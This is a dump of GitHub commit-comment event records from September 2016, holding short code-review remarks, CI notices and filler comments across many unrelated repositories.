{"id":"4618069876","type":"CommitCommentEvent","actor":{"login":"bjansen"},"repo":{"name":"ceylon/ceylon-ide-common"},"payload":{"comment":{"id":19173182,"position":null,"line":null,"path":null,"commit_id":"e9917fecc9f6031c160506a047bc1629af8c748c","created_at":"2016-09-26T14:18:00Z","updated_at":"2016-09-26T14:18:00Z","body":"I don't really remember why I made a special case for toplevel function, so I'm gonna say that your change is correct."}},"created_at":"2016-09-26T14:18:00Z"}
{"id":"4618071464","type":"CommitCommentEvent","actor":{"login":"kyunooh"},"repo":{"name":"triplepy/sh8email-ios"},"payload":{"comment":{"id":19173187,"position":null,"line":null,"path":null,"commit_id":"5c57f36afc02e100a5b232334bdff693f2a6d8f3","created_at":"2016-09-26T14:18:16Z","updated_at":"2016-09-26T14:18:16Z","body":"You're welcome :D"}},"created_at":"2016-09-26T14:18:16Z"}
{"id":"4618075527","type":"CommitCommentEvent","actor":{"login":"Bkksayjac"},"repo":{"name":"github/git-lfs"},"payload":{"comment":{"id":19173200,"position":24,"line":84,"path":"api/api.go","commit_id":"849ec823549a4a9eb0a16f383dceb7783c6cf47c","created_at":"2016-09-26T14:18:53Z","updated_at":"2016-09-26T14:18:53Z","body":"32c557a"}},"created_at":"2016-09-26T14:18:53Z"}
{"id":"4618076391","type":"CommitCommentEvent","actor":{"login":"ManClown"},"repo":{"name":"ManClown/Hello-World"},"payload":{"comment":{"id":19173202,"position":1,"line":1,"path":"README.md","commit_id":"fd8b93fc6e0f040362187a8aa9b28fe509b0cfda","created_at":"2016-09-26T14:19:02Z","updated_at":"2016-09-26T14:19:02Z","body":"It's so low"}},"created_at":"2016-09-26T14:19:02Z"}
{"id":"4618076993","type":"CommitCommentEvent","actor":{"login":"KohliDev"},"repo":{"name":"vmware/liota"},"payload":{"comment":{"id":19173207,"position":15,"line":43,"path":"liota/lib/transports/web_socket.py","commit_id":"edbf61b476c1f0a6fbae4fa7dd1f9c527b129d23","created_at":"2016-09-26T14:19:08Z","updated_at":"2016-09-26T14:19:08Z","body":"TransportLayer doesn`t exist now, I`m not sure how it is inherited.\r\n I have put the new version of this file in my review request. Please use that code."}},"created_at":"2016-09-26T14:19:08Z"}
{"id":"4618077640","type":"CommitCommentEvent","actor":{"login":"staabm"},"repo":{"name":"jzaefferer/jquery-validation"},"payload":{"comment":{"id":19173208,"position":10,"line":17,"path":"src/localization/messages_ar.js","commit_id":"d71850d35c2828315086eb25e67e5d8e31d2753f","created_at":"2016-09-26T14:19:13Z","updated_at":"2016-09-26T14:19:13Z","body":"hmm I guess this is a github bug... the file does not reflect what I committed actually... "}},"created_at":"2016-09-26T14:19:13Z"}
{"id":"4618078440","type":"CommitCommentEvent","actor":{"login":"mdangear"},"repo":{"name":"mdangear/cmacctest"},"payload":{"comment":{"id":19173210,"position":5,"line":30,"path":"README.md","commit_id":"3bd6e49a6cf7ec416a87719245f9093fcfc53ee7","created_at":"2016-09-26T14:19:21Z","updated_at":"2016-09-26T14:19:21Z","body":"testing comments"}},"created_at":"2016-09-26T14:19:21Z"}
{"id":"4618078997","type":"CommitCommentEvent","actor":{"login":"Daegon"},"repo":{"name":"ruby-racer/ruby_on_rails_code_part"},"payload":{"comment":{"id":19173212,"position":17,"line":17,"path":"app/views/unsubscribes/create.js.erb","commit_id":"eca6f525346a01e160abd1c9b50eb86a33495f0f","created_at":"2016-09-26T14:19:27Z","updated_at":"2016-09-26T14:19:27Z","body":"Тут краще було б зробити для флеш повідомлень js-класс (наприклад Messanges), і виводити їх якось так - `messanges.alert(<%= @flash %>)`"}},"created_at":"2016-09-26T14:19:27Z"}
{"id":"4618081536","type":"CommitCommentEvent","actor":{"login":"Bkksayjac"},"repo":{"name":"Bkksayjac/-bangkok-"},"payload":{"comment":{"id":19173224,"position":null,"line":null,"path":null,"commit_id":"632dff5c25011c4c6b6ceb29ecd0cbeb9faa348d","created_at":"2016-09-26T14:19:50Z","updated_at":"2016-09-26T14:19:50Z","body":"632dff5"}},"created_at":"2016-09-26T14:19:50Z"}
{"id":"4618081845","type":"CommitCommentEvent","actor":{"login":"bloatware"},"repo":{"name":"textpattern/textpattern"},"payload":{"comment":{"id":19173225,"position":null,"line":null,"path":null,"commit_id":"4cb72a885113b467328ac7c4c82f97b7350165e1","created_at":"2016-09-26T14:19:53Z","updated_at":"2016-09-26T14:19:53Z","body":"Will test [fileperms()](http://php.net/manual/en/function.fileperms.php) and report back."}},"created_at":"2016-09-26T14:19:53Z"}
{"id":"4618083413","type":"CommitCommentEvent","actor":{"login":"Bkksayjac"},"repo":{"name":"Bkksayjac/-bangkok-"},"payload":{"comment":{"id":19173227,"position":1,"line":1,"path":"README.md","commit_id":"632dff5c25011c4c6b6ceb29ecd0cbeb9faa348d","created_at":"2016-09-26T14:20:07Z","updated_at":"2016-09-26T14:20:07Z","body":"632dff5"}},"created_at":"2016-09-26T14:20:07Z"}
{"id":"4618084705","type":"CommitCommentEvent","actor":{"login":"Archimedes00"},"repo":{"name":"trolund/terning"},"payload":{"comment":{"id":19173233,"position":null,"line":null,"path":null,"commit_id":"76149f07a8cb2542f8d95a18a95f79e3ab479606","created_at":"2016-09-26T14:20:18Z","updated_at":"2016-09-26T14:20:18Z","body":"pisse godt arbejde boys"}},"created_at":"2016-09-26T14:20:18Z"}
{"id":"4618084846","type":"CommitCommentEvent","actor":{"login":"mhsnjvd"},"repo":{"name":"chebfun/chebfun"},"payload":{"comment":{"id":19173234,"position":null,"line":null,"path":null,"commit_id":"c17f07b5b47353f07df0d7c6f4562e19256556e2","created_at":"2016-09-26T14:20:20Z","updated_at":"2016-09-26T14:20:20Z","body":"I didn't write `dimCheck` or in fact any of the rest of the code. I just added `dimCheck` to Chebfun class methods and to see which tests are passing etc."}},"created_at":"2016-09-26T14:20:20Z"}
{"id":"4618086961","type":"CommitCommentEvent","actor":{"login":"luk1337"},"repo":{"name":"CyanogenMod/android_device_motorola_thea"},"payload":{"comment":{"id":19173238,"position":null,"line":null,"path":null,"commit_id":"74a0e4b901ad09c516df951ccf6b2ea278c7ae08","created_at":"2016-09-26T14:20:37Z","updated_at":"2016-09-26T14:20:37Z","body":"I'll take a look at that again in few."}},"created_at":"2016-09-26T14:20:37Z"}
{"id":"4618087504","type":"CommitCommentEvent","actor":{"login":"jonathasp6"},"repo":{"name":"jonathasp6/ArctouchBus"},"payload":{"comment":{"id":19173243,"position":75,"line":75,"path":"app/src/main/java/br/com/arctouch/arctouchbus/ArctouchBus.java","commit_id":"a1af8aa2379496dd9fa7c1f26c1e8392166e44de","created_at":"2016-09-26T14:20:42Z","updated_at":"2016-09-26T14:20:42Z","body":"Sorry. It's a habit in my work to use in this way. I was wrong. "}},"created_at":"2016-09-26T14:20:42Z"}
{"id":"4618087926","type":"CommitCommentEvent","actor":{"login":"Bkksayjac"},"repo":{"name":"Bkksayjac/-bangkok-"},"payload":{"comment":{"id":19173245,"position":1,"line":1,"path":"README.md","commit_id":"632dff5c25011c4c6b6ceb29ecd0cbeb9faa348d","created_at":"2016-09-26T14:20:46Z","updated_at":"2016-09-26T14:20:46Z","body":"632dff5"}},"created_at":"2016-09-26T14:20:46Z"}
{"id":"4618088395","type":"CommitCommentEvent","actor":{"login":"Sarath-VS"},"repo":{"name":"Adenlie/AdventureService"},"payload":{"comment":{"id":19173246,"position":null,"line":null,"path":null,"commit_id":"966fa73699e9798e4a4b71f6ff4e22541b0c5c98","created_at":"2016-09-26T14:20:49Z","updated_at":"2016-09-26T14:20:49Z","body":"haha. yet a beginning\r\n"}},"created_at":"2016-09-26T14:20:49Z"}
{"id":"4618088571","type":"CommitCommentEvent","actor":{"login":"massmediagroup-11"},"repo":{"name":"ruby-racer/rails_code_presentation"},"payload":{"comment":{"id":19173247,"position":3,"line":3,"path":"app/admin/image.rb","commit_id":"e0ef4958d34a9fab53958a745bec4ec587b70530","created_at":"2016-09-26T14:20:51Z","updated_at":"2016-09-26T14:20:51Z","body":"Use %i() instead of []."}},"created_at":"2016-09-26T14:20:51Z"}
{"id":"4618089681","type":"CommitCommentEvent","actor":{"login":"pig670623"},"repo":{"name":"pig670623/StartApp_InApp_SDK_Example"},"payload":{"comment":{"id":19173249,"position":null,"line":null,"path":null,"commit_id":"f5b572ea45a4fd2376c770ed472cc1216895cd6e","created_at":"2016-09-26T14:21:02Z","updated_at":"2016-09-26T14:21:02Z","body":"- [ ] "}},"created_at":"2016-09-26T14:21:02Z"}
{"id":"4618089833","type":"CommitCommentEvent","actor":{"login":"babinslava"},"repo":{"name":"babinslava/hello-world"},"payload":{"comment":{"id":19173250,"position":null,"line":null,"path":null,"commit_id":"c4036af1c2859838418a3d703427af413debc800","created_at":"2016-09-26T14:21:03Z","updated_at":"2016-09-26T14:21:03Z","body":"This commit was **just** for checking functionality."}},"created_at":"2016-09-26T14:21:03Z"}
{"id":"4618092499","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19173254,"position":25,"line":0,"path":"libraries/stdlib/src/kotlin/util/KotlinVersion.kt","commit_id":"5e70ebede1a0993dd2d5b2ae03ee6c73062dc652","created_at":"2016-09-26T14:21:28Z","updated_at":"2016-09-26T14:21:28Z","body":"|`line 52`|\n|---|\nI thought there could be situations when one'd need to parenthesize the expression and writing `CURRENT.isAtLeast(minVersion)` would be more fluent than `(CURRENT >= minVersion)`, but now I can't come up with the example."}},"created_at":"2016-09-26T14:21:28Z"}
{"id":"4618093285","type":"CommitCommentEvent","actor":{"login":"whateverJ"},"repo":{"name":"whateverJ/DummyTrying"},"payload":{"comment":{"id":19173259,"position":null,"line":null,"path":null,"commit_id":"ca757ae89ce88a89ea87cd75c4538e5cd5d4e59e","created_at":"2016-09-26T14:21:36Z","updated_at":"2016-09-26T14:21:36Z","body":"it's empty haha"}},"created_at":"2016-09-26T14:21:36Z"}
{"id":"4618094090","type":"CommitCommentEvent","actor":{"login":"Bkksayjac"},"repo":{"name":"NYTimes/objective-c-style-guide"},"payload":{"comment":{"id":19173261,"position":5,"line":96,"path":"README_pt-BR.md","commit_id":"7e90be10ad524ee3931afc11b93c2ceb9150a991","created_at":"2016-09-26T14:21:43Z","updated_at":"2016-09-26T14:21:43Z","body":"632dff5"}},"created_at":"2016-09-26T14:21:43Z"}
{"id":"4618094146","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19173262,"position":null,"line":null,"path":null,"commit_id":"56d90f42eda748c8e727851a96194250f1247b9e","created_at":"2016-09-26T14:21:44Z","updated_at":"2016-09-26T14:21:44Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1165](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14258&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-26T14:21:44Z"}
{"id":"4618095561","type":"CommitCommentEvent","actor":{"login":"massmediagroup-11"},"repo":{"name":"ruby-racer/rails_code_presentation"},"payload":{"comment":{"id":19173269,"position":5,"line":5,"path":"app/admin/restaurant.rb","commit_id":"e0ef4958d34a9fab53958a745bec4ec587b70530","created_at":"2016-09-26T14:21:57Z","updated_at":"2016-09-26T14:21:57Z","body":"Use %i() instead of []."}},"created_at":"2016-09-26T14:21:57Z"}
{"id":"4618096570","type":"CommitCommentEvent","actor":{"login":"Bkksayjac"},"repo":{"name":"NYTimes/objective-c-style-guide"},"payload":{"comment":{"id":19173273,"position":5,"line":96,"path":"README_pt-BR.md","commit_id":"7e90be10ad524ee3931afc11b93c2ceb9150a991","created_at":"2016-09-26T14:22:06Z","updated_at":"2016-09-26T14:22:06Z","body":"632dff5"}},"created_at":"2016-09-26T14:22:06Z"}
{"id":"4618097592","type":"CommitCommentEvent","actor":{"login":"pig670623"},"repo":{"name":"pig670623/StartApp_InApp_SDK_Example"},"payload":{"comment":{"id":19173277,"position":null,"line":null,"path":null,"commit_id":"f5b572ea45a4fd2376c770ed472cc1216895cd6e","created_at":"2016-09-26T14:22:16Z","updated_at":"2016-09-26T14:22:16Z","body":"[Chris Zielger worked for Apple while still an editor at The Verge - Business Insider.pdf](https://github.com/pig670623/StartApp_InApp_SDK_Example/files/493286/Chris.Zielger.worked.for.Apple.while.still.an.editor.at.The.Verge.-.Business.Insider.pdf)\r\n"}},"created_at":"2016-09-26T14:22:16Z"}
{"id":"4618102793","type":"CommitCommentEvent","actor":{"login":"Daegon"},"repo":{"name":"ruby-stoker/rails_code_sample"},"payload":{"comment":{"id":19173289,"position":13,"line":13,"path":"app/controllers/keywords_controller.rb","commit_id":"e2260a4beeb3f2e6810947ca3cdb6afca50dbd7c","created_at":"2016-09-26T14:23:07Z","updated_at":"2016-09-26T14:23:07Z","body":"Оголошення змінної @products двічі?"}},"created_at":"2016-09-26T14:23:07Z"}
{"id":"4618102905","type":"CommitCommentEvent","actor":{"login":"dirvine"},"repo":{"name":"afck/rfcs"},"payload":{"comment":{"id":19173290,"position":30,"line":30,"path":"text/0000-group-merkle-tree/0000-group-merkle-tree.md","commit_id":"3395a575cfd9eb338451977882b8fde030920372","created_at":"2016-09-26T14:23:08Z","updated_at":"2016-09-26T14:23:08Z","body":"My worry is we mention time and there is a rush to actually put a synchronised time in place rather than using events from an event driven network. "}},"created_at":"2016-09-26T14:23:08Z"}
{"id":"4618106179","type":"CommitCommentEvent","actor":{"login":"Bkksayjac"},"repo":{"name":"ejwa/gitinspector"},"payload":{"comment":{"id":19173298,"position":null,"line":null,"path":null,"commit_id":"f36b82170fb969c52c073c8a262ad8a6546e58da","created_at":"2016-09-26T14:23:39Z","updated_at":"2016-09-26T14:23:39Z","body":"f36b821"}},"created_at":"2016-09-26T14:23:39Z"}
{"id":"4618106261","type":"CommitCommentEvent","actor":{"login":"maribel1995"},"repo":{"name":"maribel1995/Source-Code-Inspection"},"payload":{"comment":{"id":19173299,"position":null,"line":null,"path":null,"commit_id":"0d46814a5df106190fe7afcaa718ac11006f8bf6","created_at":"2016-09-26T14:23:40Z","updated_at":"2016-09-26T14:23:40Z","body":"Arrumando o for do troco"}},"created_at":"2016-09-26T14:23:40Z"}
{"id":"4618106666","type":"CommitCommentEvent","actor":{"login":"brussee"},"repo":{"name":"csrdelft/csrdelft.nl"},"payload":{"comment":{"id":19173300,"position":4,"line":36,"path":"htdocs/API/2.0/authorize.php","commit_id":"3dc12ca9c90bd69e9debba2ddb163abe44d31d21","created_at":"2016-09-26T14:23:44Z","updated_at":"2016-09-26T14:23:44Z","body":"Op dit punt mag je AuthMethod::password zetten."}},"created_at":"2016-09-26T14:23:44Z"}
{"id":"4618107514","type":"CommitCommentEvent","actor":{"login":"Bkksayjac"},"repo":{"name":"ejwa/gitinspector"},"payload":{"comment":{"id":19173303,"position":5,"line":5,"path":"README.txt","commit_id":"f36b82170fb969c52c073c8a262ad8a6546e58da","created_at":"2016-09-26T14:23:52Z","updated_at":"2016-09-26T14:23:52Z","body":"f36b821"}},"created_at":"2016-09-26T14:23:52Z"}
{"id":"4618110883","type":"CommitCommentEvent","actor":{"login":"fragglet"},"repo":{"name":"freedoom/freedoom"},"payload":{"comment":{"id":19173310,"position":null,"line":null,"path":null,"commit_id":"13bcf645e076cebbd937a1aa7317608ffa8b6bb7","created_at":"2016-09-26T14:24:23Z","updated_at":"2016-09-26T14:24:23Z","body":"Hey, minor nitpick: this isn't a good commit message. Please describe the actual change and don't force people to look up bugs to find out why the change occurred."}},"created_at":"2016-09-26T14:24:23Z"}
{"id":"4618110901","type":"CommitCommentEvent","actor":{"login":"dbrgn"},"repo":{"name":"saltyrtc/saltyrtc-meta"},"payload":{"comment":{"id":19173311,"position":null,"line":null,"path":null,"commit_id":"312878823300d84e5279dc9a46e16c58c12c77d8","created_at":"2016-09-26T14:24:24Z","updated_at":"2016-09-26T14:24:24Z","body":":+1: "}},"created_at":"2016-09-26T14:24:24Z"}
{"id":"4618112412","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"JuH33/mapotempo-web"},"payload":{"comment":{"id":19173314,"position":7,"line":8,"path":"app/views/customers/_form.html.erb","commit_id":"19b12598c91c308157ca20ea428adc534c8310aa","created_at":"2016-09-26T14:24:37Z","updated_at":"2016-09-26T14:24:37Z","body":"indent"}},"created_at":"2016-09-26T14:24:37Z"}
{"id":"4618112768","type":"CommitCommentEvent","actor":{"login":"fashioncj"},"repo":{"name":"CyanogenMod/android_device_motorola_thea"},"payload":{"comment":{"id":19173315,"position":null,"line":null,"path":null,"commit_id":"74a0e4b901ad09c516df951ccf6b2ea278c7ae08","created_at":"2016-09-26T14:24:41Z","updated_at":"2016-09-26T14:24:41Z","body":"Thanks, I flashed 0925 yesterday find it wrong and flash 0926 today but it still not work.\r\nMaybe you can focus on the path `/data/misc/adb/adb_keys/` if it existed. This path is the public key store postion before Android N(no test for Android N)."}},"created_at":"2016-09-26T14:24:41Z"}
{"id":"4618113851","type":"CommitCommentEvent","actor":{"login":"brussee"},"repo":{"name":"csrdelft/csrdelft.nl"},"payload":{"comment":{"id":19173317,"position":4,"line":36,"path":"htdocs/API/2.0/authorize.php","commit_id":"3dc12ca9c90bd69e9debba2ddb163abe44d31d21","created_at":"2016-09-26T14:24:51Z","updated_at":"2016-09-26T14:24:51Z","body":"Of kan dit nu weg sinds #127 ?"}},"created_at":"2016-09-26T14:24:51Z"}
{"id":"4618113900","type":"CommitCommentEvent","actor":{"login":"Bkksayjac"},"repo":{"name":"ejwa/gitinspector"},"payload":{"comment":{"id":19173318,"position":5,"line":5,"path":"README.txt","commit_id":"f36b82170fb969c52c073c8a262ad8a6546e58da","created_at":"2016-09-26T14:24:51Z","updated_at":"2016-09-26T14:24:51Z","body":"f36b821"}},"created_at":"2016-09-26T14:24:51Z"}
{"id":"4618114588","type":"CommitCommentEvent","actor":{"login":"pig670623"},"repo":{"name":"pig670623/StartApp_InApp_SDK_Example"},"payload":{"comment":{"id":19173321,"position":null,"line":null,"path":null,"commit_id":"f5b572ea45a4fd2376c770ed472cc1216895cd6e","created_at":"2016-09-26T14:24:58Z","updated_at":"2016-09-26T14:24:58Z","body":"[安全港 - 著陸頁.pdf](https://github.com/pig670623/StartApp_InApp_SDK_Example/files/493290/-.pdf)\r\n"}},"created_at":"2016-09-26T14:24:58Z"}
{"id":"4618115977","type":"CommitCommentEvent","actor":{"login":"anthonywittig"},"repo":{"name":"kyleeardley/PriorityQueue"},"payload":{"comment":{"id":19173325,"position":10,"line":10,"path":"app.js","commit_id":"489d0e4fd3591ac695b73b12ed0b73e3c5e4b425","created_at":"2016-09-26T14:25:08Z","updated_at":"2016-09-26T14:25:08Z","body":"This is ambiguous, it'd probably be better to say \"If the number is present:\r\n* the new number isn't added to the array\r\n* the existing number's priority is increased by one"}},"created_at":"2016-09-26T14:25:08Z"}
{"id":"4618116163","type":"CommitCommentEvent","actor":{"login":"anthonywittig"},"repo":{"name":"kyleeardley/PriorityQueue"},"payload":{"comment":{"id":19173326,"position":13,"line":13,"path":"app.js","commit_id":"489d0e4fd3591ac695b73b12ed0b73e3c5e4b425","created_at":"2016-09-26T14:25:10Z","updated_at":"2016-09-26T14:25:10Z","body":"Being able to click on an item and have it remove it is ok, but it should follow the same runtime complexity constraint as the originally proposed remove method (or add a remove method)."}},"created_at":"2016-09-26T14:25:10Z"}
{"id":"4618116450","type":"CommitCommentEvent","actor":{"login":"EpiJunkie"},"repo":{"name":"EpiJunkie/cisco-config-backup"},"payload":{"comment":{"id":19173329,"position":null,"line":null,"path":null,"commit_id":"0c58b15969fd96a47ebd64be6e72c0fe9cab0d56","created_at":"2016-09-26T14:25:12Z","updated_at":"2016-09-26T14:25:12Z","body":"Missed these comments in the commit message:\r\n\r\n- This commit adds functionality to save the running configuration to the startup configuration. This is controlled by the variable '`_action_copy_running_to_startup`', '1' is 'on' and any other value is 'off'.\r\n\r\n- There are two other actions that can be controlled now: '`_action_copy_startup`' and '`_action_copy_running`' which follow the same control mechanism of '1' turning on the functionality and any other value is off.\r\n\r\n- Check if binary `snmpset` is on system, exit if missing.\r\n\r\n- Silenced output from external binaries for cleaner output (and logs).\r\n\r\n- Added `help` directive to show available command syntax and display `_action*` and `_mode` values.\r\n\r\n- Various changes to comments for clarity or general clean up. Updated comments/docs for new functionality."}},"created_at":"2016-09-26T14:25:12Z"}
{"id":"4618116542","type":"CommitCommentEvent","actor":{"login":"Bkksayjac"},"repo":{"name":"ejwa/gitinspector"},"payload":{"comment":{"id":19173330,"position":4,"line":5,"path":"README.txt","commit_id":"f36b82170fb969c52c073c8a262ad8a6546e58da","created_at":"2016-09-26T14:25:13Z","updated_at":"2016-09-26T14:25:13Z","body":"H"}},"created_at":"2016-09-26T14:25:13Z"}
{"id":"4618117465","type":"CommitCommentEvent","actor":{"login":"Daegon"},"repo":{"name":"ruby-stoker/rails_code_sample"},"payload":{"comment":{"id":19173333,"position":105,"line":105,"path":"app/models/product.rb","commit_id":"e2260a4beeb3f2e6810947ca3cdb6afca50dbd7c","created_at":"2016-09-26T14:25:22Z","updated_at":"2016-09-26T14:25:22Z","body":"Краще якось в базі такі тексти зберігати."}},"created_at":"2016-09-26T14:25:22Z"}
{"id":"4618118581","type":"CommitCommentEvent","actor":{"login":"Bkksayjac"},"repo":{"name":"ejwa/gitinspector"},"payload":{"comment":{"id":19173335,"position":6,"line":6,"path":"README.txt","commit_id":"f36b82170fb969c52c073c8a262ad8a6546e58da","created_at":"2016-09-26T14:25:32Z","updated_at":"2016-09-26T14:25:32Z","body":"192.168.1.1"}},"created_at":"2016-09-26T14:25:32Z"}
{"id":"4618121512","type":"CommitCommentEvent","actor":{"login":"vasilisp"},"repo":{"name":"ocsigen/eliom"},"payload":{"comment":{"id":19173342,"position":null,"line":null,"path":null,"commit_id":"73f5df267ca54ba0e7e5f8819dfac77262687299","created_at":"2016-09-26T14:25:59Z","updated_at":"2016-09-26T14:25:59Z","body":"@balat I fixed the interface incompatibility: fcc620ccb73358ee938edf9f91491fba2fb60e4d ."}},"created_at":"2016-09-26T14:25:59Z"}
{"id":"4618122724","type":"CommitCommentEvent","actor":{"login":"fashioncj"},"repo":{"name":"CyanogenMod/android_device_motorola_thea"},"payload":{"comment":{"id":19173345,"position":null,"line":null,"path":null,"commit_id":"74a0e4b901ad09c516df951ccf6b2ea278c7ae08","created_at":"2016-09-26T14:26:11Z","updated_at":"2016-09-26T14:26:11Z","body":"I try put my `adbkey.pub` in it but it doesn't work."}},"created_at":"2016-09-26T14:26:11Z"}
{"id":"4618124006","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19173347,"position":null,"line":null,"path":null,"commit_id":"77cc5cd74fc8766922abee74e114f2cafcbab0f2","created_at":"2016-09-26T14:26:24Z","updated_at":"2016-09-26T14:26:24Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1061)"}},"created_at":"2016-09-26T14:26:24Z"}
{"id":"4618125870","type":"CommitCommentEvent","actor":{"login":"ari"},"repo":{"name":"ari/jobsworth"},"payload":{"comment":{"id":19173351,"position":null,"line":null,"path":null,"commit_id":"2425be9f2beae16bc040baa3e2a025d8dbfda958","created_at":"2016-09-26T14:26:42Z","updated_at":"2016-09-26T14:26:42Z","body":"This has not fixed the problem."}},"created_at":"2016-09-26T14:26:42Z"}
{"id":"4618128270","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19173358,"position":null,"line":null,"path":null,"commit_id":"df7f50992c70182abf80a77433eeaea2ce3e1cd6","created_at":"2016-09-26T14:27:05Z","updated_at":"2016-09-26T14:27:05Z","body":"..here an example where the different SEE-imp. return a value of different sign:\r\n\r\n```\r\n +---+---+---+---+---+---+---+---+\r\n |   |   | r | q | k |   |   | r |\r\n +---+---+---+---+---+---+---+---+\r\n |   | p | p | n |   |   | b |   |\r\n +---+---+---+---+---+---+---+---+\r\n | p |   | n | p |   |   |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   |   | N |   | p |   | p |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   | P | N |   | P |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   |   |   | B |   |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n | P | P |   |   | Q |   | P | P |\r\n +---+---+---+---+---+---+---+---+\r\n | R |   |   |   |   | R | K |   |\r\n +---+---+---+---+---+---+---+---+\r\n\r\nFen: 2rqk2r/1ppn2b1/p1np4/3N1p1p/2PN1P2/4B3/PP2Q1PP/R4RK1 b - - 0 18\r\nKey: 5E04F710B6378C3F\r\nCheckers: \r\nSee move: Bg7xNd4     see-Normal: 753    see-ThisPatch: -73 (correct, as Be3xBd4 is disc. check and Nc6 can't take)\r\n```"}},"created_at":"2016-09-26T14:27:05Z"}
{"id":"4618131885","type":"CommitCommentEvent","actor":{"login":"antonycs"},"repo":{"name":"Adenlie/AdventureService"},"payload":{"comment":{"id":19173370,"position":null,"line":null,"path":null,"commit_id":"966fa73699e9798e4a4b71f6ff4e22541b0c5c98","created_at":"2016-09-26T14:27:38Z","updated_at":"2016-09-26T14:27:38Z","body":"i am try to follow the github"}},"created_at":"2016-09-26T14:27:38Z"}
{"id":"4618132850","type":"CommitCommentEvent","actor":{"login":"schneems"},"repo":{"name":"rails/sprockets-rails"},"payload":{"comment":{"id":19173372,"position":5,"line":5,"path":"CHANGELOG.md","commit_id":"10bc1bd096b39a3dd632571dd517788314657056","created_at":"2016-09-26T14:27:46Z","updated_at":"2016-09-26T14:27:46Z","body":"Correct, send PR plz?"}},"created_at":"2016-09-26T14:27:46Z"}
{"id":"4618133800","type":"CommitCommentEvent","actor":{"login":"mef"},"repo":{"name":"Mango-information-systems/twitto_be"},"payload":{"comment":{"id":19173373,"position":9,"line":72,"path":"controller/client.js","commit_id":"6da5a84774c3f2aceca5e1fcb16fe2e2d05cf74b","created_at":"2016-09-26T14:27:56Z","updated_at":"2016-09-26T14:27:56Z","body":"Oh indeed, my bad, sorry. It's the map.js I've been working on, missing the `init` function, which does not follow the pattern."}},"created_at":"2016-09-26T14:27:56Z"}
{"id":"4618134337","type":"CommitCommentEvent","actor":{"login":"spike11302000"},"repo":{"name":"Codepixl/GLCraft"},"payload":{"comment":{"id":19173374,"position":null,"line":null,"path":null,"commit_id":"89dce509219f896b78e633c4e6f4ab2a8d5c40bb","created_at":"2016-09-26T14:28:00Z","updated_at":"2016-09-26T14:28:00Z","body":"ok i did not think of that"}},"created_at":"2016-09-26T14:28:00Z"}
{"id":"4618134820","type":"CommitCommentEvent","actor":{"login":"karissa"},"repo":{"name":"datproject/dat.land"},"payload":{"comment":{"id":19173376,"position":4,"line":11,"path":"server/router.js","commit_id":"fb0a73bbfdd5b02aa85287d1fafbf3b9e4c5378f","created_at":"2016-09-26T14:28:05Z","updated_at":"2016-09-26T14:28:05Z","body":"ah good catch!\r\n"}},"created_at":"2016-09-26T14:28:05Z"}
{"id":"4618136673","type":"CommitCommentEvent","actor":{"login":"dwido"},"repo":{"name":"outbrain/ui-select"},"payload":{"comment":{"id":19173381,"position":null,"line":null,"path":null,"commit_id":"8b96ea2de983f846821244b288708625bfd74e3b","created_at":"2016-09-26T14:28:21Z","updated_at":"2016-09-26T14:28:21Z","body":"cool"}},"created_at":"2016-09-26T14:28:21Z"}
{"id":"4618139389","type":"CommitCommentEvent","actor":{"login":"731935354"},"repo":{"name":"731935354/calculator"},"payload":{"comment":{"id":19173388,"position":null,"line":null,"path":null,"commit_id":"00075ab4cf1dd55ed5eb0fb1f585f12916657d26","created_at":"2016-09-26T14:28:47Z","updated_at":"2016-09-26T14:28:47Z","body":"加入matrix界面，逻辑尚未实现"}},"created_at":"2016-09-26T14:28:47Z"}
{"id":"4618147022","type":"CommitCommentEvent","actor":{"login":"kutmicro"},"repo":{"name":"kutmicro/2013136051"},"payload":{"comment":{"id":19173403,"position":null,"line":null,"path":null,"commit_id":"bbe8f5ef7dfa75df3f6d58f1c3ddc288013450a7","created_at":"2016-09-26T14:29:56Z","updated_at":"2016-09-26T14:29:56Z","body":"2013136051 백윤기 2013136086 이석한\r\n우쿨렐레이저 조 작품 초안입니다."}},"created_at":"2016-09-26T14:29:56Z"}
{"id":"4618147482","type":"CommitCommentEvent","actor":{"login":"pierrejego"},"repo":{"name":"georchestra/cadastrapp"},"payload":{"comment":{"id":19173406,"position":null,"line":null,"path":null,"commit_id":"ff1220fec52ccabc6b38e63bdeef8c3bf8eb4207","created_at":"2016-09-26T14:30:01Z","updated_at":"2016-09-26T14:30:01Z","body":"Bonjour,\r\nEst-ce qu'on ne pourrait pas déplacer le jsbuild dans le pom parent, ça semblerait plus logique non ?"}},"created_at":"2016-09-26T14:30:01Z"}
{"id":"4618147603","type":"CommitCommentEvent","actor":{"login":"SDKiller"},"repo":{"name":"yiisoft/yii2-authclient"},"payload":{"comment":{"id":19173407,"position":4,"line":8,"path":"CHANGELOG.md","commit_id":"2b08ef174f5d194fd2cbb5e6b1a66383f1466905","created_at":"2016-09-26T14:30:02Z","updated_at":"2016-09-26T14:30:02Z","body":"Duplicates another PR number #132 "}},"created_at":"2016-09-26T14:30:02Z"}
{"id":"4618148981","type":"CommitCommentEvent","actor":{"login":"dirvine"},"repo":{"name":"dirvine/rfcs"},"payload":{"comment":{"id":19173412,"position":85,"line":85,"path":"0045-relocate-nodes/0045-relocate-nodes.md","commit_id":"062bd3aeabf3a5fa5a9c20e8e1359c0d23ed0019","created_at":"2016-09-26T14:30:15Z","updated_at":"2016-09-26T14:30:15Z","body":"Yes that has been a bit of an internal debate for me just now. It's not straightforward. I will try and expand the thinking here.  "}},"created_at":"2016-09-26T14:30:15Z"}
